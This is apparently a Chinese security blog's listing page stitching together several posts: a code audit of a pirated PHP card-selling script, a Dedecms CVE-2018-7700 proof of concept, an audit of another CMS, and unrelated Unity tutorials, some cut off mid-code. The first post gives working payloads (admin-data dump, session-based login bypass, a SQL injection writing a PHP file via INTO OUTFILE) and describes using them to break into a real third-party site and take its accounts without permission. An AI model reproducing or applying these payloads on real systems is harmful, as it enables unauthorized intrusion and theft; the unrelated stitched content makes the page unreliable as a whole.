代码 – ChaBug安全

记一次由百度云会员引起的审计及渗透

Y4er — Sat, 06 Jul 2019 17:19:44 +0000

本文首发于secquan，未经许可禁止转载

百度云盘真的恶心，不开会员10k/s。

前言#

前天找了点域渗透的环境和资料，都是百度云盘存储的，一个镜像十几个g，下不下来，发现网上有卖百度云VIP账号的，都是一些发卡网，刚好自己最近在学代码审计，就想着下载一套源码自己看看能不能审出漏洞。没想到还真看出来了点东西。

开搞#

目标站点xx.com扫出了readme.txt，是企业版PHP自动发卡源码免授权优化版

看到这免授权优化版我就知道有戏，很可能存在后门。网上找了一套

目录结构和目标站点一样，应该就是这套了。

本地搭建，然后源代码扔到seay先跑着，我先大概看下架构

index.php入口

典型的mvc架构

伪静态重写URL

代码审计这方面我是新手，所以我的目标是找找sql注入、未授权访问、上传点以及越权，当然考虑到是免授权优化版，我还可以找找后门：文件遍历或者代码执行

[后门?]文件遍历#

/bom.php的checkdir()函数

递归遍历当前目录下的所有文件。

这个文件应该是去除文件的bom头，不知道算不算后门。

过滤方式#

\includes\libs\Functions.php

全局makeSafe()函数过滤，强转数字，addslashes()和mysql_real_escape_string()转义字符串，strip_tags去除html标签

\includes\libs\Mysql.php

MySQL使用UTF8编码

我发现的SQL语句变量全部使用单引号进行包裹，寄希望于seay，暂放。

[后门]获取管理员账户#

\admin\adminInfo.php没有鉴权

function getmethod(){

$ob = new Admin_Model();

$items = $ob->getData(1, 10, “WHERE id <> -1”);

$index = 0;

echo “”;

foreach($items as $item){

echo “

”;

$index ++;

if($index == 1){

foreach($item as $key => $val){

if(preg_match(“/^\d*$/”,$key)){

continue;

}

echo “

”;

}

echo “

”;

echo “

”;

}

foreach($item as $key => $val){

if(preg_match(“/^\d*$/”,$key)){

continue;

}

echo “

”;

}

echo “

”;

}

echo “

$key
$val

”;

}

payload：/admin/adminInfo.php?action=get

[后门]无需密码登录后台#

还是\admin\adminInfo.php

function infomethod(){

$ob = new Admin_Model();

$u = $ob->getOneData($_GET[‘id’]);

$_SESSION[‘login_adminname’]=$u[‘username’];

$_SESSION[‘login_adminid’]=$u[‘id’];

$_SESSION[‘login_adminutype’]=$u[‘utype’];

$_SESSION[‘login_adminlimit’]=explode(‘|’,$u[‘adminlimit’]);

}

payload:先访问/admin/adminInfo.php?action=info&id=1然后访问/admin/

[后门]SQL注入#

还是\admin\adminInfo.php的infomethod()函数

1	$u = $ob->getOneData($_GET[‘id’]);

id直接代入数据库查询，可尝试into outfile

payload

1	http://go.go/admin/admininfo.php?action=info&id=-1 union select 1,2,3,4,5,6,7,8,9,10,’ phpinfo()?>‘ into outfile ‘E:/WWW/faka/1.php’

后台任意文件上传#

/admin/set.php未对文件后缀校验

漏洞利用#

文件遍历拿到后台=>adminInfo.php拿到管理员账户或直接登陆=>任意文件上传拿shell

实战#

后门进入后台，上传没有写文件权限，sql注入outfile写文件被宝塔拦截，尝试多种方法无果，放弃，毕竟账号已经有了，下东西去。

ps:我没想到一个卖百度云账号的流水一天也能7k

总结#

网站是死的，思路是活的。渗透测试的精髓是指哪打哪，希望我可以做到。另外如果有师傅知道怎么绕过宝塔写shell的请pm我，感激不尽。有在学代码审计的同学也欢迎找我交流哦！

Dedecms V5.7后台任意代码执行[CVE-2018-7700]

Y4er — Wed, 28 Mar 2018 16:32:00 +0000

该漏洞的触发点为/dede/tag_test_action.php。起因是csrf_check()的绕过，导致可执行任意代码。

POC:

http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}

利用条件：登录后台
解决方案：重新实现csrf_check()函数

Unity中UGUI实现技能冷却

Y4er — Mon, 26 Mar 2018 09:55:59 +0000

直接贴代码

using UnityEngine;
using System.Collections;
using UnityEngine.UI;
public class TestFiled : MonoBehaviour
{
    private Image m_image;
    //冷却时间
    public float time=2;
    void Start ()
    {
        m_image = this.GetComponent ();
        //设置图片类型为filed
        m_image.type=Image.Type.Filled;
        //设置图片填充方法
        m_image.fillMethod=Image.FillMethod.Radial360;
        //设置初始填充位置
        m_image.fillOrigin=2;
        //填充比例
        m_image.fillAmount=0;
    }
    void Update ()
    {
        //如果填充比例小于1

动画系统Macanim笔记

Y4er — Fri, 23 Mar 2018 19:12:40 +0000

Character Controller

Character Controller

可以让角色“动起来”的常用组件有三个：Transform，Rigidbody，Character Controller
角色控制器也属于物理组件，它的位置在：
Component- >Physics- >Character Controller
角色控制器主要用于第三人称或者第一人称游戏主角(人形为主)控制。

控制角色移动
SimpleMove（Vector3）：简单移动

以一定的速度移动角色，会自动应用重力。
[角色控制器不是刚体，但是具备刚体的一些属性]
Move（Vector3）：移动
更为复杂的一种运动，每次都绝对运动，不会应用重力。

水平：Horizontal，对应 AD 键，以及方向键的←和→。
垂直：Vertical，对应 WS 键，以及方向键的↑和↓。
轴向有返回值的，范围为-1 ~ 0 ~ 1。根据按键的力度返回相应的值。
4.取得轴向的值
Input.GetAxis（“轴向名称”）;

float horizontal=Input.GetAxis("Horizontal");
float vertical = Input.GetAxis ("Vertical");
//具有刚体的一些属性的简单移动
m_CC.SimpleMove ((new Vector3 (horizontal, 0, vertical))*3);
//移动 不会掉落
m_CC.Move ((new Vector3 (horizontal, 0, vertical))*0.333f);

角色控制器属性讲解

Slope Limit

斜率限制，控制角色最大的爬坡斜度。[演示：角色爬坡]

Step Offset

台阶高度，控制角色可以迈上最大的台阶高度。[演示：角色上台阶]

Skin Width [默认即可]

皮肤厚度，在角色的外围包裹着一层“皮肤”，设置这层皮肤的厚度。
数值调大，最明显的就是角色和地面之间的间距变大，也就是角色皮肤变厚了。

Min Move Distance [默认即可]

最小移动距离，默认是 0.001，也就是 1 毫米。
如果该数值调大，但代码中单位移动速度很慢，角色就不会动。

Center/Radius/Height

角色控制器组件在 Scene 面板中体现为一个“胶囊碰撞器”的形状。
Center：控制中心点的位置；
Radius：控制半径；
Height：控制高度。

小技巧：在 Game 面板将 Gizmos 设置为选中状态，可以在运行状态看到组
件的图标，方便运行过程中对组件进行调试。

方法

void OnControllerColliderHit(ControllerColliderHit hit){
    Debug.Log (hit.gameObject.name);
}

Apply Root Motion

勾选上之后，如果动画有位移，则真的发生位移。

动画过渡延迟

把过渡线上的Has Exit Time勾掉即可马上过渡。

Unity3D之float Input.GetAxis(string axisname)

Y4er — Thu, 22 Mar 2018 11:07:19 +0000

从像这样的脚本，可以查询当前状态：

value = Input.GetAxis ("Horizontal");
一个轴具有-1和1之间的值。中间位置为0。这种情况用于操纵杆输入和键盘输入。

然而，鼠标增量和Window Shake增量是鼠标或窗口从上一帧到现在的移动。这意思是当用户快速移动鼠标时，它可能大于1或小于-1。

参数内容如下:

1.触屏类：

MouseX 鼠标按着并沿着屏幕X轴方向滑动时触发

MouseY 鼠标按着并沿着屏幕Y轴方向滑动时触发

Mouse ScrollWheel 当鼠标滚动轮滚动时触发

2.键盘操作类：

1.Vertical 对应键盘上面的上下箭头，当按下上或下箭头时触发

2.Horizontal 对应键盘上面的左右箭头，当按下左或右箭头时触发

    using UnityEngine;
    using System.Collections;
    public class example :Monobehaviour {
        public float speed = 10.0F;
        public float rotationSpeed = 100.0F;
        void Update() {
            float translation = Input.GetAxis("Vertical") * speed;
            float rotation = Input.GetAxis("Horizontal") * rotationSpeed;
            translation *= Time.deltaTime;
            rotation *= Time.deltaTime;
            transform.Translate(0, 0, translation);
            transform.Rotate(0, rotation, 0);
        }
    }

// A very simplistic car driving on the x-z plane.
// 一个十分简单的在x-z平面的驾车例子
var speed : float = 10.0;
var rotationSpeed : float = 100.0;
function Update () {
    // Get the horizontal and vertical axis.
    //获取横向和纵向坐标轴
    // By default they are mapped to the arrow keys.
    //默认情况下他们关联到方向键上
    // The value is in the range -1 to 1
    //值的范围是在-1到1之间
    var translation : float = Input.GetAxis ("Vertical") * speed;
    var rotation : float = Input.GetAxis ("Horizontal") * rotationSpeed;
    // Make it move 10 meters per second instead of 10 meters per frame...
    // 使它每帧移动10米变为每秒移动10米...
    translation *= Time.deltaTime;
    rotation *= Time.deltaTime;
    // Move translation along the object's z-axis
    //沿着z轴平移对象
    transform.Translate (0, 0, translation);
    // Rotate around our y-axis
    //以我们的y轴为中心旋转

对优客365CMS的一次审计

Y4er — Wed, 21 Mar 2018 14:12:00 +0000

核心小可爱的文章

先看一下目录结构

Data ---  应该为缓存之类的
Install--- 安装目录
Member---  用户目录
Module---  模型
Public---   公用
Source---    未看
System---  后台
Themes---   主题
Config.php  配置
Dir.sql 安装时所需的数据库文件
Index.php  入口文件
Test.php

TEST.php

不知道这个test.php到底是干什么的，然后我打开它执行一下它里面的语句，是把导航查询出来然后以数组的形式进行输出，感觉没什么用，先放着

Config.php主要对数据库进行了配置

然后看一下index.php

把其中必要重要的东西记录一下：

define('ROOT_PATH', str_replace('\\', '/', dirname(__FILE__)).'/');

定义常量，根目录，文件目录部分的\替换为/

define('CORE_PATH', ROOT_PATH.'source/'); source目录

define('MOD_PATH', ROOT_PATH.'module/'); module目录

任意文件包含

在index.php中有这么一段

$module = $_GET['mod'] ? $_GET['mod'] : $_POST['mod'];

然后在浏览器中可以看到例如用户注册 URL为 http://localhost/member/?mod=register

Mod=模型名，这样就很容易理解他的逻辑了

然后我跟随逻辑一个一个进行查看。

如果我在 module目录新建一个phpinfo()的文件，名字为phpinfo呢

可以看到phpinfo出来了，他并没有判断里面的内容和用户，而是存在就在后面添加.php执行，那麽我把内容改为一话呢？但是怎么让他存在这个文件就是个令人深思的问题喽。

然后我直接在URL修改模块名字，一个一个分析。

Api.php中看到了intval ，这个函数是把用户的输入转换为整数，一般来说这种就不存在注入问题了。

很多表单限制字数 maxlength=”20″修改即可

Login.php

表单提交用户名密码trim消除空格无视导致用户登陆处SQL注入一枚

既然用户登陆处存在SQL注入，那麽来看一下管理员代码处

使用到了htmLspecialchars函数过滤了提交的用户名密码，但是大家知道这个函数他是过滤XSS的，那麽对SQL注入有关系吗？SQL注入一枚

同样的在用户注册也用了trim，但是后端限制了字数

后台添加用户用的和前台一样的方法，SQL一枚

添加广告

Keywords 把Post的过滤。如果没有POST的就使用 GET过来的，但是GET过来的没有过滤

不得不说到处都是SQL注入。。。

后台GETshell

这里倒是加上过滤了，可是好像驴头不对马嘴

直接将修改的内容写入配置，我在修改配置时

页面版权加入一句话木马，然后GETSHELL。

这套源码确实挺适合我们小白学习审计的，应该还有很多洞没有看，实践出真知。